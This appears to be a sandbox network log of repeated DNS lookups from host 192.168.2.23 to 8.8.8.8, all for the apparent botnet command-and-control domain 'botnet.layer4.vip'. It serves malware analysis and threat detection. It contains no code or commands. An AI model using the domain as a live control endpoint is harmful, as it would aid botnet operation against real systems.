                                  Apr 9, 2023 03:32:14.982954979 CEST192.168.2.238.8.8.80xf1d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.998466015 CEST192.168.2.238.8.8.80xb59cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.013979912 CEST192.168.2.238.8.8.80xb59cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.038419962 CEST192.168.2.238.8.8.80xb59cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.053925037 CEST192.168.2.238.8.8.80xb59cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.077976942 CEST192.168.2.238.8.8.80xb59cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.102144957 CEST192.168.2.238.8.8.80x94a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.126142025 CEST192.168.2.238.8.8.80x94a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.152189970 CEST192.168.2.238.8.8.80x94a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.168009996 CEST192.168.2.238.8.8.80x94a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.192151070 CEST192.168.2.238.8.8.80x94a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.216769934 CEST192.168.2.238.8.8.80x4397Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.241235971 CEST192.168.2.238.8.8.80x4397Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.265466928 CEST192.168.2.238.8.8.80x4397Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.289969921 CEST192.168.2.238.8.8.80x4397Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.314078093 CEST192.168.2.238.8.8.80x4397Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.329788923 CEST192.168.2.238.8.8.80xe83eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.353967905 CEST192.168.2.238.8.8.80xe83eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.378137112 CEST192.168.2.238.8.8.80xe83eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.402247906 CEST192.168.2.238.8.8.80xe83eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.417768002 CEST192.168.2.238.8.8.80xe83eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.442169905 CEST192.168.2.238.8.8.80xa2a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.457703114 CEST192.168.2.238.8.8.80xa2a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.473448038 CEST192.168.2.238.8.8.80xa2a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.488996029 CEST192.168.2.238.8.8.80xa2a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.513170958 CEST192.168.2.238.8.8.80xa2a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.537738085 CEST192.168.2.238.8.8.80x3d86Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.562149048 CEST192.168.2.238.8.8.80x3d86Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.577630043 CEST192.168.2.238.8.8.80x3d86Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.593105078 CEST192.168.2.238.8.8.80x3d86Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.608589888 CEST192.168.2.238.8.8.80x3d86Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.632757902 CEST192.168.2.238.8.8.80x38efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.648562908 CEST192.168.2.238.8.8.80x38efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.664124012 CEST192.168.2.238.8.8.80x38efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.688129902 CEST192.168.2.238.8.8.80x38efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.712228060 CEST192.168.2.238.8.8.80x38efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.727931976 CEST192.168.2.238.8.8.80x5559Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.743846893 CEST192.168.2.238.8.8.80x5559Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.759644032 CEST192.168.2.238.8.8.80x5559Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.784084082 CEST192.168.2.238.8.8.80x5559Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.808506966 CEST192.168.2.238.8.8.80x5559Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.833089113 CEST192.168.2.238.8.8.80x4d7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.848700047 CEST192.168.2.238.8.8.80x4d7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.864166021 CEST192.168.2.238.8.8.80x4d7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.879730940 CEST192.168.2.238.8.8.80x4d7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.903852940 CEST192.168.2.238.8.8.80x4d7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.919883966 CEST192.168.2.238.8.8.80x509fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.944258928 CEST192.168.2.238.8.8.80x509fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.960195065 CEST192.168.2.238.8.8.80x509fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.975965023 CEST192.168.2.238.8.8.80x509fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.991391897 CEST192.168.2.238.8.8.80x509fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.007200003 CEST192.168.2.238.8.8.80x7fd3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.022735119 CEST192.168.2.238.8.8.80x7fd3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.038476944 CEST192.168.2.238.8.8.80x7fd3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.053953886 CEST192.168.2.238.8.8.80x7fd3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.069422960 CEST192.168.2.238.8.8.80x7fd3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.085031033 CEST192.168.2.238.8.8.80xabc0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.100996971 CEST192.168.2.238.8.8.80xabc0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.116863966 CEST192.168.2.238.8.8.80xabc0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.132755995 CEST192.168.2.238.8.8.80xabc0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.148586035 CEST192.168.2.238.8.8.80xabc0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.172987938 CEST192.168.2.238.8.8.80xdfa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.189944029 CEST192.168.2.238.8.8.80xdfa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.205569983 CEST192.168.2.238.8.8.80xdfa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.230106115 CEST192.168.2.238.8.8.80xdfa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.254332066 CEST192.168.2.238.8.8.80xdfa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.270577908 CEST192.168.2.238.8.8.80x78ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.286359072 CEST192.168.2.238.8.8.80x78ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.310651064 CEST192.168.2.238.8.8.80x78ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.335108042 CEST192.168.2.238.8.8.80x78ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.359421015 CEST192.168.2.238.8.8.80x78ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.374896049 CEST192.168.2.238.8.8.80x907aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.390749931 CEST192.168.2.238.8.8.80x907aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.406533003 CEST192.168.2.238.8.8.80x907aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.430620909 CEST192.168.2.238.8.8.80x907aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.455112934 CEST192.168.2.238.8.8.80x907aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.479525089 CEST192.168.2.238.8.8.80x9dd3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.503561974 CEST192.168.2.238.8.8.80x9dd3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.519437075 CEST192.168.2.238.8.8.80x9dd3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.535407066 CEST192.168.2.238.8.8.80x9dd3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.551275969 CEST192.168.2.238.8.8.80x9dd3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.575460911 CEST192.168.2.238.8.8.80xfcdeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.591270924 CEST192.168.2.238.8.8.80xfcdeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.607312918 CEST192.168.2.238.8.8.80xfcdeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.631699085 CEST192.168.2.238.8.8.80xfcdeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.647521019 CEST192.168.2.238.8.8.80xfcdeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.663105011 CEST192.168.2.238.8.8.80xc29cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.687575102 CEST192.168.2.238.8.8.80xc29cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.703074932 CEST192.168.2.238.8.8.80xc29cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.719029903 CEST192.168.2.238.8.8.80xc29cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.743232012 CEST192.168.2.238.8.8.80xc29cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.758795023 CEST192.168.2.238.8.8.80x5640Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.782946110 CEST192.168.2.238.8.8.80x5640Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.798669100 CEST192.168.2.238.8.8.80x5640Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.814235926 CEST192.168.2.238.8.8.80x5640Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.838294983 CEST192.168.2.238.8.8.80x5640Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.853884935 CEST192.168.2.238.8.8.80x2462Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.869699955 CEST192.168.2.238.8.8.80x2462Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.893738985 CEST192.168.2.238.8.8.80x2462Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.918061018 CEST192.168.2.238.8.8.80x2462Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.942461967 CEST192.168.2.238.8.8.80x2462Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.958002090 CEST192.168.2.238.8.8.80x2479Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.973941088 CEST192.168.2.238.8.8.80x2479Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.989552021 CEST192.168.2.238.8.8.80x2479Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.005181074 CEST192.168.2.238.8.8.80x2479Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.020658970 CEST192.168.2.238.8.8.80x2479Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.036478043 CEST192.168.2.238.8.8.80x6d54Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.051927090 CEST192.168.2.238.8.8.80x6d54Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.075928926 CEST192.168.2.238.8.8.80x6d54Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.091804028 CEST192.168.2.238.8.8.80x6d54Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.107287884 CEST192.168.2.238.8.8.80x6d54Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.131428957 CEST192.168.2.238.8.8.80xa436Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.155616045 CEST192.168.2.238.8.8.80xa436Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.179649115 CEST192.168.2.238.8.8.80xa436Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.206351995 CEST192.168.2.238.8.8.80xa436Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.230568886 CEST192.168.2.238.8.8.80xa436Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.255141973 CEST192.168.2.238.8.8.80x4f67Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.270978928 CEST192.168.2.238.8.8.80x4f67Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.286586046 CEST192.168.2.238.8.8.80x4f67Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.302177906 CEST192.168.2.238.8.8.80x4f67Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.318067074 CEST192.168.2.238.8.8.80x4f67Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.333956957 CEST192.168.2.238.8.8.80xe5a8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.358402014 CEST192.168.2.238.8.8.80xe5a8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.374264956 CEST192.168.2.238.8.8.80xe5a8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.398746014 CEST192.168.2.238.8.8.80xe5a8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.422974110 CEST192.168.2.238.8.8.80xe5a8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.447350979 CEST192.168.2.238.8.8.80x94a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.463296890 CEST192.168.2.238.8.8.80x94a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.487729073 CEST192.168.2.238.8.8.80x94a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.503573895 CEST192.168.2.238.8.8.80x94a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.519459009 CEST192.168.2.238.8.8.80x94a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.535060883 CEST192.168.2.238.8.8.80x1b76Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.550529957 CEST192.168.2.238.8.8.80x1b76Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.566090107 CEST192.168.2.238.8.8.80x1b76Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.581666946 CEST192.168.2.238.8.8.80x1b76Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.597621918 CEST192.168.2.238.8.8.80x1b76Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.621829033 CEST192.168.2.238.8.8.80xc6f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.646044016 CEST192.168.2.238.8.8.80xc6f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.662000895 CEST192.168.2.238.8.8.80xc6f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.686484098 CEST192.168.2.238.8.8.80xc6f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.702357054 CEST192.168.2.238.8.8.80xc6f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.726635933 CEST192.168.2.238.8.8.80x185cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.742585897 CEST192.168.2.238.8.8.80x185cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.767025948 CEST192.168.2.238.8.8.80x185cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.783021927 CEST192.168.2.238.8.8.80x185cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.807533979 CEST192.168.2.238.8.8.80x185cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.823816061 CEST192.168.2.238.8.8.80xb3beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.840971947 CEST192.168.2.238.8.8.80xb3beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.865979910 CEST192.168.2.238.8.8.80xb3beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.881850004 CEST192.168.2.238.8.8.80xb3beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.906119108 CEST192.168.2.238.8.8.80xb3beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.930740118 CEST192.168.2.238.8.8.80xbc44Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.954988956 CEST192.168.2.238.8.8.80xbc44Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.970923901 CEST192.168.2.238.8.8.80xbc44Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.995417118 CEST192.168.2.238.8.8.80xbc44Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.019917965 CEST192.168.2.238.8.8.80xbc44Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.044282913 CEST192.168.2.238.8.8.80x937bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.060200930 CEST192.168.2.238.8.8.80x937bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.084372997 CEST192.168.2.238.8.8.80x937bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.099877119 CEST192.168.2.238.8.8.80x937bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.115430117 CEST192.168.2.238.8.8.80x937bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.139879942 CEST192.168.2.238.8.8.80x42c0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.155515909 CEST192.168.2.238.8.8.80x42c0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.171091080 CEST192.168.2.238.8.8.80x42c0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.195184946 CEST192.168.2.238.8.8.80x42c0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.219613075 CEST192.168.2.238.8.8.80x42c0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.235299110 CEST192.168.2.238.8.8.80x6b1eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.251195908 CEST192.168.2.238.8.8.80x6b1eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.267347097 CEST192.168.2.238.8.8.80x6b1eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.291608095 CEST192.168.2.238.8.8.80x6b1eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.316154957 CEST192.168.2.238.8.8.80x6b1eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.340847015 CEST192.168.2.238.8.8.80xc7caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.356961012 CEST192.168.2.238.8.8.80xc7caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.372853994 CEST192.168.2.238.8.8.80xc7caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.397094011 CEST192.168.2.238.8.8.80xc7caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.412702084 CEST192.168.2.238.8.8.80xc7caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.436995029 CEST192.168.2.238.8.8.80x35d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.461179018 CEST192.168.2.238.8.8.80x35d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.485675097 CEST192.168.2.238.8.8.80x35d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.510251999 CEST192.168.2.238.8.8.80x35d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.534580946 CEST192.168.2.238.8.8.80x35d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.558903933 CEST192.168.2.238.8.8.80x4584Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.583477020 CEST192.168.2.238.8.8.80x4584Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.599128008 CEST192.168.2.238.8.8.80x4584Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.614773035 CEST192.168.2.238.8.8.80x4584Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.639280081 CEST192.168.2.238.8.8.80x4584Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.655014038 CEST192.168.2.238.8.8.80xee38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.679564953 CEST192.168.2.238.8.8.80xee38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.695492029 CEST192.168.2.238.8.8.80xee38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.720187902 CEST192.168.2.238.8.8.80xee38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.736021996 CEST192.168.2.238.8.8.80xee38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.760464907 CEST192.168.2.238.8.8.80x8f69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.784737110 CEST192.168.2.238.8.8.80x8f69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.800715923 CEST192.168.2.238.8.8.80x8f69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.816765070 CEST192.168.2.238.8.8.80x8f69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.832664967 CEST192.168.2.238.8.8.80x8f69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.848562002 CEST192.168.2.238.8.8.80xb7f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
